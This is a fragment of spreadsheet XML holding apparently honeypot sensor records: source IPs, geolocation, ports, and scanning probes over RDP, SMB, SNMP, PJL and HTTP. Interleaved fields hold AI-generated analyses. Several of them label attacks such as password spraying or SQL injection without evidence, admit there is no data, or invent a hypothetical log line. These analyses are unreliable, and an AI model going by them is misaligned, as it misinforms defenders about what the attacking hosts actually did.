;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_RDP_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_LDAP_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;NA&amp;&amp;1080&amp;&amp;110&amp;&amp;49599&amp;&amp;1521&amp;&amp;389&amp;&amp;161&amp;&amp;6379&amp;&amp;143&amp;&amp;445&amp;&amp;3306&amp;&amp;5900&amp;&amp;3389&amp;&amp;55319&amp;&amp;50590&amp;&amp;52328&amp;&amp;9100&amp;&amp;54592&amp;&amp;1433&amp;&amp;23&amp;&amp;21&amp;&amp;80&amp;&amp;8443&amp;&amp;54016&amp;&amp;53725&amp;&amp;55802&amp;&amp;52185&amp;&amp;443</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fBpFpLiUh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TthruF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iOlDFC'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62782)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62790)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,62792)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qBAYkbvQG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CwtYPU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UVyCdh'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ANaaERCxn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jLuatS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CeqSvw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yrClEeaOj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zlZSjn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NvBFxc'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,60808)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,60822)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59148)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59160)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,59172)}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63642)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63654)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,63660)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ifqNpPIXn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EelYKd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LuNHdn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FeznCUlWj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CFGDmT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TNHFlf'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dnHjjZYIs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mzseEp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JWOQRT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SeciuKgvX'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.126,61210)}</t>
  </si>
  <si>
    <t>::ffff:93b9:847e</t>
  </si>
  <si>
    <t>The attacker is likely performing reconnaissance and scanning activities, possibly as a precursor to launching more targeted attacks. They are attempting to identify vulnerabilities and gain access to various services on the network. &amp;&amp; No log data provided. &amp;&amp; An incoming connection from an unknown IP address is attempting to access SMB service, which may be a sign of malicious activity such as unauthorized data transfer or malware spread. This could be an attempt by attackers to exploit the system's shared resources or inject malware. The IP address and port combination indicates a potential security threat. &amp;&amp; An unknown device attempted to connect to SMB service from IP address 147.185.132.126 on port 61210. This could be a brute force login attempt or scanning for vulnerabilities. The device may be trying to exploit or access sensitive data through the SMB connection. &amp;&amp; The system is unable to collect SNMP log data, which may indicate a monitoring issue or a potential security vulnerability allowing malicious activity to go unnoticed. This lack of data could be due to various reasons such as configuration issues or network problems. The absence of SNMP logs might make it difficult to detect suspicious activities. &amp;&amp; Possible malicious activity is attempted unauthorized access via an IMAP service as there are no valid credentials being provided for this connection attempt. The lack of credentials indicates that the attacker is trying to exploit potential vulnerabilities or brute-force a login. This action could be part of a larger phishing or reconnaissance operation. &amp;&amp; The log data indicates suspicious login attempts from unknown IP addresses, likely a brute force attack to gain unauthorized access to the system. These attempts are targeting various services, potentially compromising user credentials and system security. The unknown IP addresses suggest an external threat source attempting unauthorized access. &amp;&amp; This log entry suggests an attempt to exploit a SIP service for malicious purposes, possibly a port scanning or probing activity. The lack of a valid Data_SIP value may indicate an invalid or malformed request. This could be a precursor to further exploitation or reconnaissance. &amp;&amp; The presence of this entry suggests an attempt to access a database service without providing valid credentials, potentially indicating a brute force or unauthorized access attempt.
This can be a precursor to further malicious activities such as data theft or system compromise.
It may also indicate the use of a vulnerability scanner or malicious script trying to exploit weak passwords.</t>
  </si>
  <si>
    <t>Password Spraying &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>653c1bc1763d087721e1f5d3e41ea021</t>
  </si>
  <si>
    <t>180.5.124.220</t>
  </si>
  <si>
    <t>NA&amp;&amp;p1618220-ipxg00g01yosemiya.okinawa.ocn.ne.jp</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']</t>
  </si>
  <si>
    <t>47</t>
  </si>
  <si>
    <t>Okinawa</t>
  </si>
  <si>
    <t>Naha Shi</t>
  </si>
  <si>
    <t>Naha</t>
  </si>
  <si>
    <t>1856035</t>
  </si>
  <si>
    <t>900-0000</t>
  </si>
  <si>
    <t>26.243</t>
  </si>
  <si>
    <t>127.68</t>
  </si>
  <si>
    <t>4713</t>
  </si>
  <si>
    <t>NTT Communications Corporation</t>
  </si>
  <si>
    <t>Open Computer Network</t>
  </si>
  <si>
    <t>::ffff:b405:7cdc</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or explain possible malicious activity. &amp;&amp; No data provided, unable to analyze malicious activity. 
This would typically involve identifying suspicious login attempts or network connections.
It could indicate unauthorized access attempts or malicious scanning of the system. &amp;&amp; No log data available, unable to analyze malicious activity. &amp;&amp; No log data provided, unable to analyze.</t>
  </si>
  <si>
    <t>56e726cc7c4fe5d1f0c62d1ccf353f01</t>
  </si>
  <si>
    <t>77.227.124.190</t>
  </si>
  <si>
    <t>din-190-124-227-77.ipcom.comunitel.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1918&amp;&amp;23&amp;&amp;NA&amp;&amp;53994</t>
  </si>
  <si>
    <t>CT</t>
  </si>
  <si>
    <t>Catalonia</t>
  </si>
  <si>
    <t>Barcelona</t>
  </si>
  <si>
    <t>Montcada i Reixac</t>
  </si>
  <si>
    <t>3116527</t>
  </si>
  <si>
    <t>08110</t>
  </si>
  <si>
    <t>41.4833</t>
  </si>
  <si>
    <t>2.18333</t>
  </si>
  <si>
    <t>12430</t>
  </si>
  <si>
    <t>VODAFONE ESPANA S.A.U.</t>
  </si>
  <si>
    <t>Vodafone Espana S.A.U.</t>
  </si>
  <si>
    <t>Comunitel Global S.A.</t>
  </si>
  <si>
    <t>::ffff:4de3:7cbe</t>
  </si>
  <si>
    <t>There is insufficient log data to analyze for possible malicious activity. 
The log data does not provide any information about potential security threats. 
No indicators of malicious behavior are present. &amp;&amp; No log data provided, cannot analyze activity. 
However, here's an example of what a brief analysis might look like with some hypothetical log data:
Log data: "Unauthorized login attempt from IP 192.168.1.100 at 2022-01-01 12:00:00."
Possible malicious activity is a user trying to access the system without permission from an unknown location. This could be a brute force attack or phishing attempt. The system's security may have been compromised if multiple such attempts are made within a short period.</t>
  </si>
  <si>
    <t>19ff1f704e4d548c7cd7f43ac398b47b</t>
  </si>
  <si>
    <t>153.200.216.31</t>
  </si>
  <si>
    <t>p2247031-ipxg00e01kobeminato.hyogo.ocn.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hyōgo</t>
  </si>
  <si>
    <t>Kōbe Shi</t>
  </si>
  <si>
    <t>Kobe</t>
  </si>
  <si>
    <t>1859171</t>
  </si>
  <si>
    <t>650-0007</t>
  </si>
  <si>
    <t>34.6901</t>
  </si>
  <si>
    <t>135.196</t>
  </si>
  <si>
    <t>::ffff:99c8:d81f</t>
  </si>
  <si>
    <t>No analysis can be done without log data.</t>
  </si>
  <si>
    <t>b952f2b62737ae9785d980d07d74fb02</t>
  </si>
  <si>
    <t>108.62.106.7</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;6379&amp;&amp;NA&amp;&amp;56913</t>
  </si>
  <si>
    <t>DuPage</t>
  </si>
  <si>
    <t>Lombard</t>
  </si>
  <si>
    <t>4900373</t>
  </si>
  <si>
    <t>60148</t>
  </si>
  <si>
    <t>41.8493</t>
  </si>
  <si>
    <t>-88.0298</t>
  </si>
  <si>
    <t>27411</t>
  </si>
  <si>
    <t>Leaseweb USA, Inc.</t>
  </si>
  <si>
    <t>LeaseWeb USA, Inc. Chicago</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,58154)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,56328)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,56425)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64946)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,63869)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51267)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52132)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52172)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,49757)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,49850)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64760)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51778)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51954)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52235)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,52311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51459)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,51507)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,64324)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65508)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,59960)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,60438)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65131)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,55206)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,55317)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,53292)}</t>
  </si>
  <si>
    <t>::ffff:6c3e:6a07</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze any activity. 
The lack of data indicates that there is currently no information available about potential malicious activities detected.</t>
  </si>
  <si>
    <t>995fb5a19378b1ce5df37f49fd759278</t>
  </si>
  <si>
    <t>111.70.15.77</t>
  </si>
  <si>
    <t>111-70-15-77.emome-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22672&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>25.032</t>
  </si>
  <si>
    <t>121.526</t>
  </si>
  <si>
    <t>17421</t>
  </si>
  <si>
    <t>Mobile Business Group</t>
  </si>
  <si>
    <t>EMOME</t>
  </si>
  <si>
    <t>::ffff:6f46:f4d</t>
  </si>
  <si>
    <t>No malicious activity reported yet. Data is empty. No indicators of unauthorized access or suspicious behavior present. &amp;&amp; No log data provided, unable to analyze or describe any activity.</t>
  </si>
  <si>
    <t>There is no log data provided to analyze. Please provide the log data for me to identify the types of attacks.</t>
  </si>
  <si>
    <t>3b42230e711449b29d96b340aab04870</t>
  </si>
  <si>
    <t>66.191.170.220</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-066-191-170-220.res.spectrum.com</t>
  </si>
  <si>
    <t>Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NC</t>
  </si>
  <si>
    <t>North Carolina</t>
  </si>
  <si>
    <t>Catawba</t>
  </si>
  <si>
    <t>Hickory</t>
  </si>
  <si>
    <t>4470778</t>
  </si>
  <si>
    <t>28602</t>
  </si>
  <si>
    <t>35.6704</t>
  </si>
  <si>
    <t>-81.3619</t>
  </si>
  <si>
    <t>20115</t>
  </si>
  <si>
    <t>Charter Communications</t>
  </si>
  <si>
    <t>CHARTER-NET-5BLK</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:42bf:aadc</t>
  </si>
  <si>
    <t>Insufficient log data provided to analyze malicious activity. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data provided, cannot analyze malicious activity.</t>
  </si>
  <si>
    <t>There is no log data provided. Please provide the log data for analysis. 
(Once you provide the log data, I'll be happy to help analyze it and identify the type of attack based on your instructions.)</t>
  </si>
  <si>
    <t>3afdc079755ec66a90944ca850ef84a0</t>
  </si>
  <si>
    <t>198.38.85.42</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>Navi Mumbai</t>
  </si>
  <si>
    <t>19.033</t>
  </si>
  <si>
    <t>73.0297</t>
  </si>
  <si>
    <t>199404</t>
  </si>
  <si>
    <t>WHG Hosting Services Ltd</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51987)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,52162)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,50274)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,50344)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,55729)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,56025)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,52845)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,56332)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51398)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51549)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,53329)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,55454)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:c626:552a</t>
  </si>
  <si>
    <t>23e913e7f207469749d31af4c7db29c0</t>
  </si>
  <si>
    <t>213.215.234.126</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;10108</t>
  </si>
  <si>
    <t>IT</t>
  </si>
  <si>
    <t>Italy</t>
  </si>
  <si>
    <t>62</t>
  </si>
  <si>
    <t>Lazio</t>
  </si>
  <si>
    <t>Rome</t>
  </si>
  <si>
    <t>Vitinia</t>
  </si>
  <si>
    <t>6698334</t>
  </si>
  <si>
    <t>41.7912</t>
  </si>
  <si>
    <t>12.4081</t>
  </si>
  <si>
    <t>8220</t>
  </si>
  <si>
    <t>COLT Technology Services Group Limited</t>
  </si>
  <si>
    <t>COLT Internet IT</t>
  </si>
  <si>
    <t>Residence Le Torri SpA</t>
  </si>
  <si>
    <t>::ffff:d5d7:ea7e</t>
  </si>
  <si>
    <t>None&amp;&amp;C-I&amp;&amp;C-I_D</t>
  </si>
  <si>
    <t>No TELNET activity detected, suggesting potential scan or probing attempt to identify service availability. This could be an initial step in launching a more targeted attack. The absence of activity may indicate the system is not visible on the network. &amp;&amp; There is insufficient data provided for analysis.
No possible malicious activity can be inferred from the given log data. &amp;&amp; No malicious activity detected as TELNET service is not being accessed. &amp;&amp; There is insufficient log data to analyze possible malicious activity. 
The given log data does not indicate any notable events or attempts.
No notable threats or attacks are reported based on this information. &amp;&amp; There is insufficient data to analyze any malicious activity. 
This indicates that either there has been no incident or the monitoring system has yet to detect anything unusual. 
The lack of log data prevents further assessment.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; I'll need some actual log data to analyze! Please provide it, and I'll be happy to help.</t>
  </si>
  <si>
    <t>61e374a0a517a910d3bd1dfa6c02c16d</t>
  </si>
  <si>
    <t>45.164.177.100</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H26</t>
  </si>
  <si>
    <t>23&amp;&amp;34074&amp;&amp;NA</t>
  </si>
  <si>
    <t>Caraguatatuba</t>
  </si>
  <si>
    <t>3467081</t>
  </si>
  <si>
    <t>-23.6203</t>
  </si>
  <si>
    <t>-45.4131</t>
  </si>
  <si>
    <t>268645</t>
  </si>
  <si>
    <t>FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP</t>
  </si>
  <si>
    <t>Future Digital Technology E Telecom Ltda EPP</t>
  </si>
  <si>
    <t>login&amp;&amp;NA&amp;&amp;connection</t>
  </si>
  <si>
    <t>::ffff:2da4:b164</t>
  </si>
  <si>
    <t>The attacker is attempting to scan for open services on the targeted system, likely as a reconnaissance step before launching further attacks. They are trying various protocols and ports to identify vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve"> PortScan</t>
  </si>
  <si>
    <t>bd47ec94ec911004dad74b74c22e0392</t>
  </si>
  <si>
    <t>45.164.177.103</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;27376&amp;&amp;23&amp;&amp;15100&amp;&amp;13698&amp;&amp;51593&amp;&amp;NA</t>
  </si>
  <si>
    <t>None&amp;&amp;NA&amp;&amp;connection</t>
  </si>
  <si>
    <t>None&amp;&amp;NA&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:2da4:b167</t>
  </si>
  <si>
    <t>f5622dd9905245ca157f3cc4498ee1ee</t>
  </si>
  <si>
    <t>50.199.81.66</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>Pennsylvania</t>
  </si>
  <si>
    <t>Bucks</t>
  </si>
  <si>
    <t>Ivyland</t>
  </si>
  <si>
    <t>5195068</t>
  </si>
  <si>
    <t>40.2079</t>
  </si>
  <si>
    <t>-75.0727</t>
  </si>
  <si>
    <t>::ffff:32c7:5142</t>
  </si>
  <si>
    <t>95daab1dbb653ba2bbc16d4d78817f2e</t>
  </si>
  <si>
    <t>78.109.53.98</t>
